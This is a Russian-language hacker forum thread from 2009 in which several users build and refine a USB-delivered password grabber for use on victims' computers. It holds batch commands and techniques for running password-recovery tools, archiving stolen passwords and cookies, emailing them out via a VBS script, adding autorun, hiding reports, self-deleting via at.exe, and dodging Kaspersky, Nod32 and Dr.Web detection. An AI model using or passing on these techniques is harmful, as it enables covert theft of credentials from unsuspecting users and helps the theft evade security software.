RE: Граббинг при помощи флэшки
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Граббинг при помощи флэшки - 2009-03-14 12:49:47.133333
|
|
|
drdeaths
Сообщений: 4
Оценки: 0
Присоединился: 2009-03-12 17:22:14.720000
|
Скажите пожалуйста. А куда этот скрипт прописывать, чтоб кроме выполняемых действий еще копировались указанные фалы на флешку?
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-14 20:00:27.860000
|
|
|
KABUS
Сообщений: 235
Оценки: 0
Присоединился: 2007-04-21 15:59:02.723333
|
В тот же архив только при создании самораспаковываюшегося (блин что за слово) архива прописать на запуск этот скрипт посмотри на страничке все намана расписано. graberkabus.narod.ru
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-15 10:41:16.506666
|
|
|
drdeaths
Сообщений: 4
Оценки: 0
Присоединился: 2009-03-12 17:22:14.720000
|
А как быть если файлы находяться в папке пользователя (C:\document and setting\user\), вель путь на каждом компьютере будет разным. Можна зделать универсальный скрипт?
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-15 12:32:23.023333
|
|
|
uzzzver4556464
Сообщений: 230
Оценки: 0
Присоединился: 2008-07-31 01:42:54.426666
|
Посмотри переменные окружения, %userprofile%-ведет туда куда надо
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-15 16:05:11.246666
|
|
|
KABUS
Сообщений: 235
Оценки: 0
Присоединился: 2007-04-21 15:59:02.723333
|
Товарищ!!! Если ты экспортируешь данные указывая путь экспорта данных пользователя (смотри скрипт) , то есть пароли и всякая ерунда экспортируются в папку %tmp% зачем тебе угадывать какие то пути к данным. Утилиты распаковываются в указанную тобою папку, данные экспортируются в указанную тобою папку, я выложил скрипт с примерами куда и как экспортировать, так в чем дело??? тебе нужно запомнить (можешь записать куда нить) пути которые ты указал и потом скопировать ТУДА куда ты указал в скрипте.
ЕСЛИ БУДУТ ПРОБЛЕМЫ ОТПРАВЬ МНЕ КУДА ЭКСПОРТИРОВАТЬ И КУДА КОПИРОВАТЬ Я НАПИШУ СКРИПТ.
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-15 19:02:38.606666
|
|
|
KABUS
Сообщений: 235
Оценки: 0
Присоединился: 2007-04-21 15:59:02.723333
|
Нашел в себе силы создать хэлпик (потому как он маленький) по настройке Граббера в картинках (Кто хочет могу организовать черно-белую или контурную версию для раскраски). Там все в картинках показано что и как делать.
——————————————————————————————————–
ЖЕЛАЮ УДАЧИ В ВАШИХ ТКМНЫХ ДЕЛИШКАХ С МОИМ МАЛЕНЬКИМ ХЭЛПИКОМ
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-15 19:06:36.603333
|
|
|
KABUS
Сообщений: 235
Оценки: 0
Присоединился: 2007-04-21 15:59:02.723333
|
СКАЧАТЬ ХЭЛПИК (чуть не забыл) :)
——————————————————————————————————–
ЖЕЛАЮ УДАЧИ В ВАШИХ ТКМНЫХ ДЕЛИШКАХ С МОИМ МАЛЕНЬКИМ ХЭЛПИКОМ
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-23 09:16:59.140000
|
|
|
Sokol345
Сообщений: 34
Оценки: 0
Присоединился: 2009-03-20 11:01:34.813333
|
С IECookiesView (iecv) не хочет сохранять в файл, вылезает окошко, как исправить?
для мозилы все работает…и еще для оперы есть подобное что нибудь?
как bat(или скрипт) написать что бы он архивировал в zip все *.dat файлы из папки raport?
и почему скрипт отправки почты работает тока с диском с:\pass.txt , а из других папок не работает(( из %tmp%\raport\ как сделать чтоб он брал файл?
уфф…вроде пока все, не хочу сильно загружать)) остальное вроде работает…
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-23 21:19:30.573333
|
|
|
KABUS
Сообщений: 235
Оценки: 0
Присоединился: 2007-04-21 15:59:02.723333
|
Приветсвую.
1.Если просмотреть сам скрипт отправки почты то нетрудно заметить что в конце скрипта указывается путь к файлу который нужно приатачить к письму. Поменяй путь и имя файла и тогда скрипт будет аттачить все что ты хочешь.
2.В скриптах бейсика путь к темп файлам указывается совсем по другому (не помню) но скопируй уже готовый архив с дат файлами (как архивировать укажу ниже), куда нибудь в более нормальное место отправь с помошью скрипта (указано выше).
3. Для архивирования дат файлов (и вооше любых файлов) в составе винрара есть консольская версия (если не уверен что в компе жертвы есть или установлен винрар) тебе придется таскать консолькую архивалку в теле грабера, но если ты уверен что в компе жертвы есть винрар то достаточно написать файл-лист файлов для аривации и бат файл который заархивирует дат файлы. Вот вставка с хэлпа как работать с консольной версией Хотя у уверен что ты даже не заглянул в папку винрара :) держи….
Файлы-списки - это обычные текстовые файлы, содержащие имена файлов
для обработки. Каждое имя файла должно быть указано на отдельной строке
и начинаться с первой позиции строки. В файл-список допускается
помещать комментарии, признак начала комментария - символы //.
Например, для архивирования файлов *.txt из каталога c:\work\doc, файлов
*.bmp из каталога c:\work\image и всех файлов из каталога c:\work\misc
можно создать файл-список backup.lst, содержащий следующие строки:
c:\work\doc\*.txt //резервная копия текстов
c:\work\image\*.bmp //резервная копия рисунков
c:\work\misc
После этого для архивирования достаточно будет выполнить команду:
rar a backup @backup.lst
Если требуется прочитать имена файлов с устройства stdin (стандартный
ввод), то нужно указать только символ "@", не вводя после него имени
файла (т.е. просто @).
—————————————————————————————————————-
Удачи в ваших темненьких делишках!!!
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-23 21:23:18.286666
|
|
|
KABUS
Сообщений: 235
Оценки: 0
Присоединился: 2007-04-21 15:59:02.723333
|
путь к темп папке содержится в переменной %tmp%
косольку можно засунуть в архив грабера ну и лист туда где просто можно указать файлы по расширению в нашем случае это *.dat
Главное распаковать консольку , батник и лист файлов для архивации в одну и туже папку (например в тот же темп) чтобы не заниматься потом ректальным криптоанализом.
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-24 13:31:39.226666
|
|
|
Sokol345
Сообщений: 34
Оценки: 0
Присоединился: 2009-03-20 11:01:34.813333
|
как(чем) майл скрипт откомпилировать в исполняемый файл, не охото чтоб кто то спер пароль от почты, если додумается пошариться в архиве))
===========================
=мой граббер (только исходники)=
===========================
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-24 13:51:29.366666
|
|
|
Sokol345
Сообщений: 34
Оценки: 0
Присоединился: 2009-03-20 11:01:34.813333
|
нашел несколько недостатков:
1. если не установлен firefox на компе жертвы, лучше из сборки удалить проги которые тырят его пароли и куки. вылезает окно с ошибкой, если кто знает что прописать в батнике чтоб оно не вылезало, делитесь))
2. майл скрипт когда отправляет мыло, палится фаерволами, те. фаервол запрашивает разрешение((
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-24 20:27:24.830000
|
|
|
Sokol345
Сообщений: 34
Оценки: 0
Присоединился: 2009-03-20 11:01:34.813333
|
стоит раз добавить в правила к фаерволу и потом он запускается без проблем.
где взять исходники к прогам которые мы тут используем (или как достать из того что есть), а то все одной программкой кто нибудь бы догадался все это сделать и выложить исходники. Меня вес убивает этого архива))) каспером и нодом вроде не палица…
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-24 20:33:22.496666
|
|
|
Sokol345
Сообщений: 34
Оценки: 0
Присоединился: 2009-03-20 11:01:34.813333
|
забыл совсем, в последней сборке имя exe файла которое компилите из bat, пишите erxplorer.exe )) если хотите свое, то меняйте в run.reg на свое. Ну вроде все теперь!!!))
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-24 22:38:11.726666
|
|
|
uzzzver4556464
Сообщений: 230
Оценки: 0
Присоединился: 2008-07-31 01:42:54.426666
|
quote:
ORIGINAL: Sokol345
все доделал свой граббер, ловите и пользуйтесь (добавляется в автозапуск, майл скрипт не зубудьте редактировать под себя). мне пока хватит, теперь тока осталось закинуть в логово ЖЕРТВЫ :D
===============================
=мой граббер v2.0 (только исходники)=
===============================
Офигеть, ну вы даете… А по скромней нельзя? Отчет на системном диске - на мой взгляд слишком палевно. Жертва сразу кинется проверять автозагрузку и тут граберу придет жирный полярный пушной зверь (писец).У меня Комодо на такую измену выпадает при старте грабера!!!
quote:
автозапуск (или по расписанию). если есть мысли направьте меня в нужное направление))
в батнике можно с помощью at.exe в планировщике можно создать задание запускающее твой батник.
лично от себя - отчет лучьше копировать в папку history в системном профиле юзера, стандартными средствами Окошек он там ничего не увидит !!!
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-25 06:00:14.220000
|
|
|
Sokol345
Сообщений: 34
Оценки: 0
Присоединился: 2009-03-20 11:01:34.813333
|
так ладно, как скопировать через батник отчет в history, у меня не получается (пользователи то разные) ? и что потом прописать в майл скрипте (какой путь, опять же пользователи разные) ?
чтоб отчет вообще никуда не копировать и не палица, проще в майл скрипте прописать чтоб он брал его из temp папки, но я не знаю как там прописать. Скажите кто нибудь)))
планировщик задач требует логин и пароль, а если я их не знаю, как тогда его туда прописать?
хмм…еще вот что, как сделать чтоб граббер запускался при запуске(завершении) какой либо проги?
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-25 12:08:36.640000
|
|
|
uzzzver4556464
Сообщений: 230
Оценки: 0
Присоединился: 2008-07-31 01:42:54.426666
|
У тебя какие права в системе? Если админа, то создай юзера с правами админа и от его имени создай задание
А в папку хистори можно попасть так.
cd /d "%userprofile\%Local Settings\History\"
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-25 12:19:36.670000
|
|
|
Sokol345
Сообщений: 34
Оценки: 0
Присоединился: 2009-03-20 11:01:34.813333
|
если пользователя создам то надо изменять вход в систему, что бы по умолчанию загружался родной пользователь…
quote:
cd /d "%userprofile\%Local Settings\History\"
это же для батника
как правильно прописать в iMsg.AddAttachment "%temp%\raport\pass.rar"
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-25 22:36:13.920000
|
|
|
KABUS
Сообщений: 235
Оценки: 0
Присоединился: 2007-04-21 15:59:02.723333
|
Добрый вечер вот вы тута устроили разборки покедова меня не было. Интересно интересно….
1. Команда которая прописывает путь к темп файлу в скрипте бэйсика ??? зачем я же сказал выше вот
copy %tmp%\raport\*.dat c:\windows\addins\*.dat (это для батника пример), после этой команды все отчеты будут в вышеуказанной папке и делай с ними что хочешь добавишь в архив бедт так c:\windows\addins\raport.rar, вот посля этого в скрипте сендера можно прописать путь к аттачу без всяких переменных и всякого геммороя.
2. Скомпилировать vbs скрипт!!! я компилирую при поощи программы scriptCrypter хотя есть еше scriptexe можно написать скрипт который доводит отправителя в неудобочитаемый (блин что за слово) вид. Покопаюсь найду выложу исходники.
3. Скачал ваши ерсии грабера покопаюсь поинтересуют протестю.
4. ИдеяФикс., можно к раберу добавить пару команд на батнике который собирает еше и информацию про имя компа дерево расположения папок на дисках четные записи (это конечно по надобности).
—————————————————————————————————————————————————-
СПАСИБО ЗА ПОДДЕРЖКУ И РАЗВИТИЕ ГРАБЕРА.
УДАЧИ В ВАШИХ ТЕМНЫХ ДЕЛИШКАХ.
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-25 22:50:07.780000
|
|
|
KABUS
Сообщений: 235
Оценки: 0
Присоединился: 2007-04-21 15:59:02.723333
|
что за хернятворится с оцценками и статусом??? где мои оццццценки???? статус упал что творится ???
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-26 07:00:01.976666
|
|
|
Sokol345
Сообщений: 34
Оценки: 0
Присоединился: 2009-03-20 11:01:34.813333
|
доработал сборку свою сборку Граббер теперь он отчет не кидает на диск С
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-27 10:25:39.646666
|
|
|
KABUS
Сообщений: 235
Оценки: 0
Присоединился: 2007-04-21 15:59:02.723333
|
Протестил +2
молодест :) дабавь в скрипт переименовать уже готовый архив в папке отчетов в какую нить хрентотень типа с расширением *.abc на всяк случай :)
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-27 11:18:04.153333
|
|
|
Sokol345
Сообщений: 34
Оценки: 0
Присоединился: 2009-03-20 11:01:34.813333
|
нашел ошибку у себя небольшую, в бат надо дописать: md c:\WINDOWS\addins
иначе если папки нету, то и отчеты брать не откуда, у меня без этого на мыло не отправлялось 8)
если надо удалить папку addins или raport, то напишите в конце:
del /q %tmp%\raport
rmdir %tmp%\raport
del /q c:\WINDOWS\addins
rmdir c:\WINDOWS\addins
еще косяк с PasswordFox.exe если не установлен Firefox то выдает ошибку(или когда под другим пользователем ни разу не запускался Firefox), если кто решит проблему то отпишитесь, тырит пароли то классно 8)
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-27 12:29:04.206666
|
|
|
Sokol345
Сообщений: 34
Оценки: 0
Присоединился: 2009-03-20 11:01:34.813333
|
как написать в батнике чтоб файл сам себя удалил потом:
если пишу в del.bat: del c:\del.bat - то батник сам себя удаляет, тут все нормально;
а если в нем же: del c:\del.exe (с последующим компилированием(жжж) в exe) то он сам себя не может удалить((
кстати на некоторых компах скрипт отправки почты не работает(фаер. не блокирутет)…
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-27 12:39:18.110000
|
|
|
Sokol345
Сообщений: 34
Оценки: 0
Присоединился: 2009-03-20 11:01:34.813333
|
так мне все нравится кроме одного:
как в майл скрипте прописать чтоб он в теме (или теле) письма писал имя компа и имя пользователя, те. как батник дописывает в имени?!?!
А то все письма одинаковые приходят, и узнаешь от кого пришло тока когда откроешь архив((
KABUS переименованные в левое расширение это хорошо если через виндовский проводник смотреть, Total Commander открывает этот архивчик без проблем, ему плевать на расширение 8)
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-27 14:18:22.676666
|
|
|
uzzzver4556464
Сообщений: 230
Оценки: 0
Присоединился: 2008-07-31 01:42:54.426666
|
quote:
ORIGINAL: Sokol345
del /q %tmp%\raport
rmdir %tmp%\raport
del /q c:\WINDOWS\addins
rmdir c:\WINDOWS\addins
А непроще ?
rmdir /s /q %tmp%\raport
quote:
ORIGINAL: Sokol345
как написать в батнике чтоб файл сам себя удалил потом:
если пишу в del.bat: del c:\del.bat - то батник сам себя удаляет, тут все нормально;
а если в нем же: del c:\del.exe (с последующим компилированием(жжж) в exe) то он сам себя не может удалить((
Экзешник всегда блокируется системой, можеш проверить на любой программе - пока она не завершена, удалить нельзя.
Попробуй создать задание в котором прописана команда удаления компиленого батника.
Попробуй эту хрень проверить!
@echo off
for /f "delims=: tokens=1,2" %%i in ('time /t') do set hour=%%i& set min=%%j
set /a min=min+1
at %hour%:%min% cmd.exe /c del /q ""%0""
но этот батник удалится только спустя минуту после запуска, к тому же служба планировщика должна работать.
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-27 19:08:07.713333
|
|
|
Sokol345
Сообщений: 34
Оценки: 0
Присоединился: 2009-03-20 11:01:34.813333
|
quote:
А непроще ?
rmdir /s /q %tmp%\raport
ну да так проще))
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-27 19:56:11.406666
|
|
|
Sokol345
Сообщений: 34
Оценки: 0
Присоединился: 2009-03-20 11:01:34.813333
|
проги использованые палятся, так что когда ставите смотрите что стоит у жертвы))
не мог удержаться, вот кто чем палится:
Nod32
палит почти все что каспер в повышенном режиме
Dr.Web
mspass.exe
netpass.exe
pspv.exe
Kaspersky
iepv.exe
mailpv.exe
MozillaHistoryView.exe
mspass.exe
mzcv.exe
netpass.exe
ProduKey.exe
pspv.exe
PstPassword.exe
PasswordFox.exe
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-27 20:46:02.010000
|
|
|
uzzzver4556464
Сообщений: 230
Оценки: 0
Присоединился: 2008-07-31 01:42:54.426666
|
Эта тема была озвучена очень давно, только решения адекватного никто не предложил!
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-27 22:00:54.310000
|
|
|
KABUS
Сообщений: 235
Оценки: 0
Присоединился: 2007-04-21 15:59:02.723333
|
Граббер "изготовленный" вами мне понравился., но черное окно которое вылезает мешает "втихую"
на глазах у всего честного народа тырить все подряд. Но сам
скрипт написан грамотно видно несколько раз переписывал товарищщщ Хакер :)., я попытался скомпилировать при помощи QuickBatCompiler результат нод и каспер чуть с ума не сошли., значит батники не поляцца но вылезает черное окно ., а если не вылезает черное окно (файл скомпилирован)… вылезает сообшение антивиря., какой то заколдованный круг ., решил скомпилировать включив в тело бэйсик формы результат 4 килобайта (точнее 4 377 байтов)., на диске 8 кило (точнее 8 192)., вот контрольные суммы….
—————————————————-
CRC32 : B8F66BF1
MD5 : 5CC797ABC0104C813D9B30A70B403173
SHA-1 : 142F2484B5F582129E04C3A124AEADF55DD93DDB
—————————————————-
Скомпилировал и предлагаю вам включить в SFX архив вместо батника черного окна терминала
не будет. В архиве бинарник и батник чтобы посмотрели код в код я добавил только одну строчку
в конце del %0 для самоудаления.
Ж Е Л А Ю У Д А Ч И В В А Ш И Х Т Е М Н Ы Х Д Е Л И Ш К А Х …
D O W N L O A D ! ! !
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-28 04:57:45.106666
|
|
|
Igoreshka
Сообщений: 20
Оценки: 0
Присоединился: 2007-11-09 18:57:53.356666
|
чето не скачивается ваша прога для граббинга
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-28 08:54:33.920000
|
|
|
Sokol345
Сообщений: 34
Оценки: 0
Присоединился: 2009-03-20 11:01:34.813333
|
KABUS я же выкладывал тока исходники, я бат файл так никогда не запускал(черное окно палица), все время компилировал QuickBatCompiler, и запихивал в sfx архив…
вот последняя моя сборка Граббер (только исходники) за компилировал батник, вам остается тока запихать все в sfx архив по методу KABUSa. На флешке должны быть папки: logfiles\pass\ в папке pass и будут ваши отчеты!!!
тока не забывайте править майл скрипт
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-28 10:44:24.090000
|
|
|
~ Professor ][ ~
Сообщений: 182
Оценки: 0
Присоединился: 2009-02-25 13:18:07.723333
|
quote:
ORIGINAL: KABUS
что за хернятворится с оцценками и статусом??? где мои оццццценки???? статус упал что творится ???
Канули твои оценки в лету по решению… В общем не важно, продолжай работать.
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-28 17:51:06.103333
|
|
|
KABUS
Сообщений: 235
Оценки: 0
Присоединился: 2007-04-21 15:59:02.723333
|
Канули твои оценки в лету по решению… В общем не важно, продолжай работать.!!!!!!!!!!!!!??????????????????????????
Что то не могу понять особой тупостью не блистал я че то непонял в движке сайта что то происходит???
Просто интересно почему и по чьему решению пропали оцценки? И не тока у меня. Что твориться?
Помню в прошлом году сайт целые 2 месяца был недоступен за пределами РФ и я не мог зайти а теперя что?
————————————————————————————————————————————
Скрипт батника скомпилированный QuickBatCompiler палицца не только каспером но и нодом и именно по этой причине я заключил его в тело васьки.
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-28 18:32:06.930000
|
|
|
Sokol345
Сообщений: 34
Оценки: 0
Присоединился: 2009-03-20 11:01:34.813333
|
Только что проверил нод и каспер не палят уже скомпиленый батник(каспером проверял прям на сайте)
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-29 10:08:50.580000
|
|
|
_SMerCH_
Сообщений: 27
Оценки: 0
Присоединился: 2009-03-29 09:27:01.560000
|
кграсвчеГГ… тут отчет высосал инфы больше чем ПИНЧ.. с моего компа … кашперский не спалил! ваще Красава МОЛОТОК!:D
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-29 10:13:34.383333
|
|
|
_SMerCH_
Сообщений: 27
Оценки: 0
Присоединился: 2009-03-29 09:27:01.560000
|
народ, обьясните ламеру что да как.
я скачал Грабер xzet-а.. мой то комп он сканирует .. а как я с флешки буду отчеты и т.п. высекать ?
они же должны куа то ложится ?
|
|
|
|
|
RE: Граббинг при помощи флэшки - 2009-03-29 10:18:11.570000
|
|
|
_SMerCH_
Сообщений: 27
Оценки: 0
Присоединился: 2009-03-29 09:27:01.560000
|
ток не грите мне что все мои сохраненные пассы уйдут к xzet:@
|
|
|
|
|
|
